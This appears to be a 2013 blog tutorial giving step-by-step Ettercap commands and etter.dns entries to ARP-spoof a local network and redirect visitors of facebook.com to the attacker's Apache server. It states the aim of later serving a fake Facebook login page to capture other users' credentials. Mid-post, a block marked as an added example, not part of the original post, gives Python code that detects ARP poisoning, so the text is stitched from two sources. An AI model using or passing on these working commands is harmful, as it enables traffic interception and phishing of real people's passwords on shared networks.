Saturday, 18 May 2013

Redirect someone to a different website (ARP spoofing) PART 1

Ok, this time I am going to show you how to redirect someone to a different website. I will just go through the basics for now, and later on we are going to combine all of the steps into one "hack attack".

NOTE: this technique will only work on your local network (cable, wifi).

DO NOT perform these kinds of actions on networks or computers other than your own!


For this attack we are going to perform something called ARP spoofing. ARP spoofing is a technique in which a computer on the local network can "poison" the ARP table of another host, causing it to send packets to the wrong destination.





The image above helps explain how ARP spoofing works. Now, if the victim surfs the internet, all the traffic goes through the attacker's computer; that way the attacker can monitor which sites the victim is visiting. The attacker can even sniff passwords or redirect the victim to another site.
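Because the poisoning rewrites the victim's own ARP table, it is visible from that host. The following is an added example, not part of the original post: a Python check that parses Linux `ip neigh show` output and flags the two signs of poisoning. The function names, the MAC addresses, the gateway IP 10.0.0.1 and the sample table are constructed assumptions; only 10.0.0.97 comes from this tutorial.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `ip neigh show` output from a host on the 10.0.0.0/24 LAN while
# it is being poisoned. 10.0.0.97 is the tutorial's attacker IP; all MACs
# (including the baseline gateway MAC used below) are made up.
SAMPLE_POISONED = """\
10.0.0.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.0.97 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
10.0.0.12 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.0.20 dev eth0 lladdr 3c:07:54:11:22:33 STALE
10.0.0.30 dev eth0  FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b", re.I)

def parse_neigh(text):
    """Return {ip: mac} for neighbour entries that carry a MAC address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_arp_anomalies(table, gateway_ip, known_gateway_mac=None):
    """Flag the two signs of ARP poisoning visible in a host's own ARP table."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    # 1) One MAC answering for several IPs: the attacker's NIC is claiming to
    #    be other hosts. Can also be legitimate (multi-homed router, proxy ARP).
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(
                ("shared_mac", mac, sorted(ips, key=ipaddress.ip_address)))
    # 2) The gateway's MAC differs from a baseline recorded on a clean network.
    current = table.get(gateway_ip)
    if known_gateway_mac and current and current != known_gateway_mac.lower():
        findings.append(("gateway_mac_changed", current, [gateway_ip]))
    return findings

if __name__ == "__main__":
    for f in find_arp_anomalies(parse_neigh(SAMPLE_POISONED),
                                "10.0.0.1", "00:1a:2b:3c:4d:5e"):
        print(f)
```

A static ARP entry for the gateway on hosts, or Dynamic ARP Inspection on managed switches, prevents the poisoning that this check only detects.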

There are a couple of tools that can be used for this type of attack, but for this tutorial we are going to use "Ettercap" which comes preinstalled on BackTrack/Kali.


And here are the steps:

Step nr 1:

First you need to find out what your IP-address on the local network is. 

Type:
  • ifconfig 
Here is a screen shot of what you will see after you have typed in the command above:




Write down the IP for your working internet connection (I am going to use my cable connection for this tutorial); we are going to use it in the next step.


Step nr 2:

Now we need to edit etter.dns and add the name of the website whose visitors we want to redirect (Facebook in this case).

Type:
  • nano /etc/ettercap/etter.dns
Now add these three lines to the bottom of the file:

facebook.com      A    10.0.0.97   

*.facebook.com    A    10.0.0.97

*.facebook.*      A    10.0.0.97


Just remember to change 10.0.0.97 to your own IP which you wrote down in the first step!

After you are done, save and exit (hit Ctrl + X, then Y, then Enter).


Step nr 2.5 (Optional):

Since all hosts on our LAN are going to visit our server, you can change what message they will be presented with instead of facebook.

Type:

  • nano /var/www/index.html

Just change the HTML content to whatever you want people to see instead, then save and exit.
Now you need to restart your Apache server in order for the changes to take effect.

Type:

  • service apache2 restart


Step nr 3:

Let's start Ettercap and redirect people.

Type:

  • ettercap -T -q -M arp -P dns_spoof // // -i eth0
Now try to visit Facebook with another computer, or whatever you have, and see what happens.

Screen shot of what other computers will see when they try to visit facebook:





NOTE: This hack will not work if you try to visit Facebook with a smartphone app; you have to use a web browser for this to work.

Here is an explanation for the command above:

-T      =  text mode
-q      =  quiet mode
-M      =  man in the middle
-P      =  plugin
// //   =  specify all hosts


The reason why we redirect all traffic for Facebook to our local IP (Apache server) is that later on we are going to put up a fake Facebook login site and trick other computers on the local network into revealing their credentials.


